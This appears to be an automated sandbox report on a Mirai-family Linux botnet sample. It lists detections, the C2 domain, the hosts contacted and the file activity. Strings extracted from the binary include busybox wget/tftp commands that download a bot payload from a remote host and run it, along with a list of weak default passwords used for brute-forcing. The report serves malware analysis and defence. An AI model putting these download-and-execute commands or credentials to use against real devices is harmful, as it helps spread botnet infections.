Linux Analysis Report
na.elf

Overview

General Information

Sample name: na.elf
Analysis ID: 1530605
MD5: c7ed33bceba3443fa3b08e8524e4f7e5
SHA1: 3e274c0691ebd032dd59b308e609f94a4a464dbd
SHA256: 7c0ad1d4c740aeebd75b9db0499ba23bbadd680e6f07672137c8348973a69076
Tags: elfMiraiuser-abuse_ch
Infos:

Detection

Mirai
Score: 72
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Deletes system log files
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: na.elf Avira: detected
Multi AV Scanner detection for submitted file
Source: na.elf ReversingLabs: Detection: 34%
Found strings indicative of a multi-platform dropper
Source: na.elf String: ash|login|wget|curl|tftp|ntpdate
Source: na.elf String: /proc//exe|ash|login|wget|curl|tftp|ntpdate/fdsocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//bin/
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.15:53606 -> 38.60.249.66:7193
Sample listens on a socket
Source: /tmp/na.elf (PID: 5521) Socket: 127.0.0.1:1234 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 55.4.250.0
Source: unknown TCP traffic detected without corresponding DNS query: 31.200.49.251
Source: unknown TCP traffic detected without corresponding DNS query: 194.227.252.195
Source: unknown TCP traffic detected without corresponding DNS query: 21.194.185.165
Source: unknown TCP traffic detected without corresponding DNS query: 124.72.189.23
Source: unknown TCP traffic detected without corresponding DNS query: 107.133.114.19
Source: unknown TCP traffic detected without corresponding DNS query: 63.59.19.135
Source: unknown TCP traffic detected without corresponding DNS query: 124.243.56.111
Source: unknown TCP traffic detected without corresponding DNS query: 155.118.25.34
Source: unknown TCP traffic detected without corresponding DNS query: 193.166.204.66
Source: unknown TCP traffic detected without corresponding DNS query: 252.185.98.41
Source: unknown TCP traffic detected without corresponding DNS query: 171.27.214.152
Source: unknown TCP traffic detected without corresponding DNS query: 84.40.244.48
Source: unknown TCP traffic detected without corresponding DNS query: 189.87.159.171
Source: unknown TCP traffic detected without corresponding DNS query: 61.166.94.91
Source: unknown TCP traffic detected without corresponding DNS query: 128.106.122.13
Source: unknown TCP traffic detected without corresponding DNS query: 200.68.69.172
Source: unknown TCP traffic detected without corresponding DNS query: 29.72.225.65
Source: unknown TCP traffic detected without corresponding DNS query: 100.145.135.35
Source: unknown TCP traffic detected without corresponding DNS query: 252.40.158.124
Source: unknown TCP traffic detected without corresponding DNS query: 25.47.82.2
Source: unknown TCP traffic detected without corresponding DNS query: 143.186.9.253
Source: unknown TCP traffic detected without corresponding DNS query: 83.88.247.239
Source: unknown TCP traffic detected without corresponding DNS query: 186.242.205.247
Source: unknown TCP traffic detected without corresponding DNS query: 61.156.59.191
Source: unknown TCP traffic detected without corresponding DNS query: 192.30.242.232
Source: unknown TCP traffic detected without corresponding DNS query: 109.62.245.8
Source: unknown TCP traffic detected without corresponding DNS query: 67.216.252.83
Source: unknown TCP traffic detected without corresponding DNS query: 14.61.23.31
Source: unknown TCP traffic detected without corresponding DNS query: 8.141.33.205
Source: unknown TCP traffic detected without corresponding DNS query: 98.41.17.52
Source: unknown TCP traffic detected without corresponding DNS query: 41.48.125.241
Source: unknown TCP traffic detected without corresponding DNS query: 15.197.182.98
Source: unknown TCP traffic detected without corresponding DNS query: 201.138.112.100
Source: unknown TCP traffic detected without corresponding DNS query: 160.130.50.24
Source: unknown TCP traffic detected without corresponding DNS query: 75.234.70.254
Source: unknown TCP traffic detected without corresponding DNS query: 143.62.173.176
Source: unknown TCP traffic detected without corresponding DNS query: 123.249.19.204
Source: unknown TCP traffic detected without corresponding DNS query: 47.241.90.227
Source: unknown TCP traffic detected without corresponding DNS query: 42.66.160.9
Source: unknown TCP traffic detected without corresponding DNS query: 113.58.44.10
Source: unknown TCP traffic detected without corresponding DNS query: 147.237.231.121
Source: unknown TCP traffic detected without corresponding DNS query: 122.122.133.15
Source: unknown TCP traffic detected without corresponding DNS query: 72.4.17.22
Source: unknown TCP traffic detected without corresponding DNS query: 115.150.202.132
Source: unknown TCP traffic detected without corresponding DNS query: 175.222.13.224
Source: unknown TCP traffic detected without corresponding DNS query: 195.78.106.188
Source: unknown TCP traffic detected without corresponding DNS query: 137.67.137.98
Source: unknown TCP traffic detected without corresponding DNS query: 113.200.126.77
Source: unknown TCP traffic detected without corresponding DNS query: 242.88.37.40
Source: global traffic DNS traffic detected: DNS query: eighteen.pirate
Source: global traffic DNS traffic detected: DNS query: daisy.ubuntu.com
Source: na.elf String found in binary or memory: http://%d.%d.%d.%d/la.bot.%s
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: '8/bin/busybox tftp -r la.bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://%d.%d.%d.%d/la.bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t
Source: Initial sample String containing 'busybox' found: /bin/busybox BOT
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/busybox || while read i; do /bin/busybox echo $i; done < /bin/busybox || /bin/busybox dd if=/bin/busybox bs=22 count=1
Source: Initial sample String containing 'busybox' found: /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
Source: Initial sample String containing 'busybox' found: /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo; /bin/busybox BOT
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
Source: Initial sample String containing 'busybox' found: /bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
Source: Initial sample String containing 'busybox' found: '8/bin/busybox tftp -r la.bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet/bin/busybox wget http://%d.%d.%d.%d/la.bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t\x%02xsh
Source: Initial sample String containing 'busybox' found: /bin/busybox BOTbuf = %s
Source: Initial sample String containing 'busybox' found: >%st && cd %s && >retrieve; >.t/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
Source: Initial sample String containing 'busybox' found: armx86_64mipsmipselsuperhpowerpcsparcget: applet not foundftp: applet not foundcho: applet not found>>>/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
Source: Initial sample String containing 'busybox' found: retrieve/bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
Sample contains strings indicative of password brute-forcing capabilities
Source: Initial sample String containing potential weak password found: service
Source: Initial sample String containing potential weak password found: guest
Source: Initial sample String containing potential weak password found: admin
Source: Initial sample String containing potential weak password found: 123456
Source: Initial sample String containing potential weak password found: default
Source: Initial sample String containing potential weak password found: 54321
Source: Initial sample String containing potential weak password found: 12345678
Source: Initial sample String containing potential weak password found: 654321
Source: Initial sample String containing potential weak password found: support
Source: Initial sample String containing potential weak password found: password
Source: Initial sample String containing potential weak password found: supervisor
Source: Initial sample String containing potential weak password found: administrator
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal72.troj.evad.linELF@0/0@3/0

Data Obfuscation
barindex
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Source: /tmp/na.elf (PID: 5525) File: /etc/config Jump to behavior
Creates hidden files and/or directories
Source: /tmp/na.elf (PID: 5525) Directory: /root/.cache Jump to behavior
Source: /tmp/na.elf (PID: 5525) Directory: /root/.ssh Jump to behavior
Source: /tmp/na.elf (PID: 5525) Directory: /root/.config Jump to behavior
Source: /tmp/na.elf (PID: 5525) Directory: /root/.local Jump to behavior
Source: /tmp/na.elf (PID: 5525) Directory: /tmp/.X11-unix Jump to behavior
Source: /tmp/na.elf (PID: 5525) Directory: /tmp/.Test-unix Jump to behavior
Source: /tmp/na.elf (PID: 5525) Directory: /tmp/.font-unix Jump to behavior
Source: /tmp/na.elf (PID: 5525) Directory: /tmp/.ICE-unix Jump to behavior
Source: /tmp/na.elf (PID: 5525) Directory: /tmp/.XIM-unix Jump to behavior
Source: /tmp/na.elf (PID: 5525) Directory: /etc/.java Jump to behavior
Executes the "rm" command used to delete files or directories
Source: /usr/bin/dash (PID: 5500) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.DqSTHg5SOE /tmp/tmp.FUxV3jxmUC /tmp/tmp.HwIRvgXqI4 Jump to behavior
Source: /usr/bin/dash (PID: 5502) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.DqSTHg5SOE /tmp/tmp.FUxV3jxmUC /tmp/tmp.HwIRvgXqI4 Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Deletes system log files
Source: /tmp/na.elf (PID: 5525) Log files deleted: /var/log/kern.log Jump to behavior
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/na.elf (PID: 5521) Queries kernel information via 'uname': Jump to behavior
Source: na.elf, 5521.1.0000562ede6d1000.0000562ede781000.rw-.sdmp Binary or memory string: !/etc/qemu-binfmt/ppc1
Source: na.elf, 5521.1.00007ffc7e0c4000.00007ffc7e0e5000.rw-.sdmp Binary or memory string: >x86_64/usr/bin/qemu-ppc/tmp/na.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/na.elf
Source: na.elf, 5521.1.0000562ede6d1000.0000562ede781000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/ppc
Source: na.elf, 5521.1.00007ffc7e0c4000.00007ffc7e0e5000.rw-.sdmp Binary or memory string: /usr/bin/qemu-ppc

Stealing of Sensitive Information
barindex
Yara detected Mirai
Source: Yara match File source: na.elf, type: SAMPLE

Remote Access Functionality
barindex
Yara detected Mirai
Source: Yara match File source: na.elf, type: SAMPLE
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
194.123.89.250
 unknown Germany
1136 KPNKPNNationalEU false
102.253.185.176
 unknown South Africa
5713 SAIX-NETZA false
119.246.189.102
 unknown Hong Kong
9269 HKBN-AS-APHongKongBroadbandNetworkLtdHK false
141.174.45.236
 unknown United States
29601 UPM-KYMMENE-ASKuusankoskiFinlandFI false
59.234.226.122
 unknown China
2516 KDDIKDDICORPORATIONJP false
68.61.146.234
 unknown United States
7922 COMCAST-7922US false
51.245.16.211
 unknown United States
2686 ATGS-MMD-ASUS false
242.166.31.243
 unknown Reserved
unknown unknown false
67.73.174.73
 unknown United States
3549 LVLT-3549US false
60.75.41.13
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
206.127.49.170
 unknown United States
11114 WINTEK-CORPUS false
101.175.179.161
 unknown Australia
1221 ASN-TELSTRATelstraCorporationLtdAU false
123.107.238.97
 unknown Japan 9595 XEPHIONNTT-MECorporationJP false
188.240.15.151
 unknown Netherlands
39855 MOD-EUNL false
255.195.132.64
 unknown Reserved
unknown unknown false
77.30.231.91
 unknown Saudi Arabia
25019 SAUDINETSTC-ASSA false
245.217.232.245
 unknown Reserved
unknown unknown false
17.91.35.78
 unknown United States
714 APPLE-ENGINEERINGUS false
76.197.175.251
 unknown United States
7018 ATT-INTERNET4US false
128.146.245.186
 unknown United States
159 OSUNET-ASUS false
13.168.83.27
 unknown United States
7018 ATT-INTERNET4US false
22.143.223.83
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
126.165.146.199
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
66.126.55.128
 unknown United States
22352 APPLIED-TECHNOLOGYUS false
1.148.236.60
 unknown Australia
1221 ASN-TELSTRATelstraCorporationLtdAU false
190.23.141.175
 unknown Paraguay
27866 COPACOPY false
216.36.68.246
 unknown United States
4565 MEGAPATH2-US false
100.134.166.241
 unknown United States
21928 T-MOBILE-AS21928US false
111.89.177.200
 unknown Japan 2514 INFOSPHERENTTPCCommunicationsIncJP false
128.53.179.232
 unknown Japan 2514 INFOSPHERENTTPCCommunicationsIncJP false
92.69.253.196
 unknown Netherlands
1136 KPNKPNNationalEU false
55.81.32.128
 unknown United States
347 DNIC-ASBLK-00306-00371US false
58.162.85.192
 unknown Australia
1221 ASN-TELSTRATelstraCorporationLtdAU false
93.28.219.173
 unknown France
15557 LDCOMNETFR false
130.41.156.159
 unknown United States
243 HARRIS-ATD-ASUS false
215.252.29.138
 unknown United States
721 DNIC-ASBLK-00721-00726US false
174.177.52.218
 unknown United States
7922 COMCAST-7922US false
203.11.144.209
 unknown Australia
10794 BANKAMERICAUS false
30.144.88.219
 unknown United States
7922 COMCAST-7922US false
11.241.81.32
 unknown United States
3356 LEVEL3US false
248.129.199.142
 unknown Reserved
unknown unknown false
157.71.232.80
 unknown Japan 131932 JEIS-NETJREastInformationSystemsCompanyJP false
90.174.75.187
 unknown Spain
12479 UNI2-ASES false
24.212.148.54
 unknown Canada
5645 TEKSAVVYCA false
86.179.156.33
 unknown United Kingdom
2856 BT-UK-ASBTnetUKRegionalnetworkGB false
87.152.228.68
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
106.97.89.15
 unknown Korea Republic of
17853 LGTELECOM-AS-KRLGTELECOMKR false
109.21.105.124
 unknown France
15557 LDCOMNETFR false
201.221.52.236
 unknown Uruguay
6057 AdministracionNacionaldeTelecomunicacionesUY false
205.222.113.72
 unknown United States
32073 MCPS-K12-MD-US false
187.234.29.99
 unknown Mexico
8151 UninetSAdeCVMX false
30.209.89.192
 unknown United States
7922 COMCAST-7922US false
115.129.152.10
 unknown Australia
133612 VODAFONE-AS-APVodafoneAustraliaPtyLtdAU false
191.85.197.155
 unknown Argentina
22927 TelefonicadeArgentinaAR false
223.66.245.144
 unknown China
56046 CMNET-JIANGSU-APChinaMobilecommunicationscorporationCN false
61.180.197.113
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
16.252.73.195
 unknown United States
7430 TANDEMUS false
30.163.216.101
 unknown United States
7922 COMCAST-7922US false
169.4.207.215
 unknown United States
203 CENTURYLINK-LEGACY-LVLT-203US false
197.55.34.211
 unknown Egypt
8452 TE-ASTE-ASEG false
205.141.136.19
 unknown United States
26059 PGH-ASUS false
200.75.126.238
 unknown Venezuela
21826 CorporacionTelemicCAVE false
193.42.153.76
 unknown Poland
48021 ALSTOR-ASPL false
196.121.69.199
 unknown Morocco
36925 ASMediMA false
139.141.205.4
 unknown Kuwait
25242 KUWAIT-UNIVERSITYComputerInformationSystemsKuwaitUniver false
181.16.252.5
 unknown Argentina
52323 ColsecorCooperativaLimitadaAR false
206.46.125.251
 unknown United States
701 UUNETUS false
49.105.53.197
 unknown Japan 9605 DOCOMONTTDOCOMOINCJP false
243.250.83.118
 unknown Reserved
unknown unknown false
166.116.73.165
 unknown United States
58681 NSWPOLSERV-AS-APNewSouthWalesPoliceAU false
123.58.228.51
 unknown China
4847 CNIX-APChinaNetworksInter-ExchangeCN false
255.193.153.114
 unknown Reserved
unknown unknown false
154.44.229.197
 unknown United States
25467 AKTON-ASAktonAutonomousSystemSI false
179.122.106.86
 unknown Brazil
26615 TIMSABR false
253.160.189.57
 unknown Reserved
unknown unknown false
200.244.158.165
 unknown Brazil
4230 CLAROSABR false
246.44.175.50
 unknown Reserved
unknown unknown false
107.84.237.238
 unknown United States
20057 ATT-MOBILITY-LLC-AS20057US false
33.191.239.232
 unknown United States
2686 ATGS-MMD-ASUS false
75.116.237.232
 unknown United States
6167 CELLCO-PARTUS false
216.249.40.137
 unknown Bermuda
3855 LOGIC-3855BM false
32.217.12.10
 unknown United States
46690 SNET-FCCUS false
45.159.66.169
 unknown Italy
60917 TEDRATEDRABACKBONEES false
72.143.32.14
 unknown Canada
812 ROGERS-COMMUNICATIONSCA false
135.195.178.41
 unknown United States
14962 NCR-252US false
190.174.130.14
 unknown Argentina
22927 TelefonicadeArgentinaAR false
4.38.93.3
 unknown United States
46164 ATT-MOBILITY-LABSUS false
45.154.143.52
 unknown Poland
269800 NTERCONEXIONHNSAHN false
1.102.42.10
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
25.248.176.207
 unknown United Kingdom
199055 UKCLOUD-ASGB false
81.255.48.64
 unknown France
3215 FranceTelecom-OrangeFR false
53.120.38.43
 unknown Germany
31399 DAIMLER-ASITIGNGlobalNetworkDE false
205.143.2.99
 unknown United States
30404 BSCL-11US false
130.199.219.122
 unknown United States
43 BNL-ASUS false
56.100.72.207
 unknown United States
2686 ATGS-MMD-ASUS false
76.119.142.186
 unknown United States
7922 COMCAST-7922US false
87.247.119.51
 unknown Lithuania
21412 CGATES-ASLT false
107.244.47.7
 unknown United States
7018 ATT-INTERNET4US false
216.184.218.89
 unknown United States
4565 MEGAPATH2-US false
59.54.215.107
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false

Contacted Domains

Name IP Active
daisy.ubuntu.com 162.213.35.24 true
eighteen.pirate 38.60.249.66 true